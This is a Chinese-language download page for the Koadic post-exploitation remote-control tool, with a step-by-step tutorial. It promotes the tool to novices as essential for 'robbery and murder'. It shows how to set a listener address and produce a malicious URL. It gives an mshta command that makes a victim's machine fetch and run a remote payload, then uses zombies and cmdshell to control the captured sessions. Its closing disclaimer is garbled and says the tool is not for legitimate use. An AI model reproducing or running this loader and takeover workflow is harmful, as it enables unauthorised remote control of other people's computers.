后渗透工具|Koadic(后渗透工具) v1.0绿色版下载

Koadic是在DEFCON上的一个后渗透工具，作为一款强大的windows提权辅助工具，Koadic对萌新特别友好，虽然类似msf，但是它是一款js/vbs 远控，模块也蛮多的，涉及的功能也很全面，算是“居家旅行，杀人越货”必备良品了，有需求的用户请下载研究吧！
Koadic

Koadic教程

1、下载软件压缩包文件，然后解压，如果你要安装到你指定的目录就先cd到那个目录，如下图：
202209171738130533390001

2、运行koadic，显示需要设置的内容：
(koadic: sta/js/mshta)# info //
查看需要设置的内容
202209171738133817450002

3、查看工具使用帮助
(koadic: sta/js/mshta)# help
202209171738137296320003

详细翻译如下：

4、进入主题，开始设置，键入set lhost，设置本地ip，如下图：
202209171738143276570005

5、生成了一个网址，其实这是一个恶意网址，里面装载了exploit
最后生成的利用命令如下：
mshta http://192.168.0.105:9999/S8QoC
利用方法是放到cmd里面执行
202209171738146046550006

6、那么当目标主机运行这个命令的时候，知识兔这边就反弹回来了会话会话ID为0
202209171738150074020007

7、如果是用其他复制批量执行了这个命令，会话比较多的话可以执行zombies来查看左右会话，并选择id进行控制
cmdshell ID
我这里应该是 cmdshell 0
202209171738153220540008

下载仅供下载体验和测试学习，不得商用和正当使用。

后渗透工具|Koadic(后渗透工具) v1.0绿色版 下载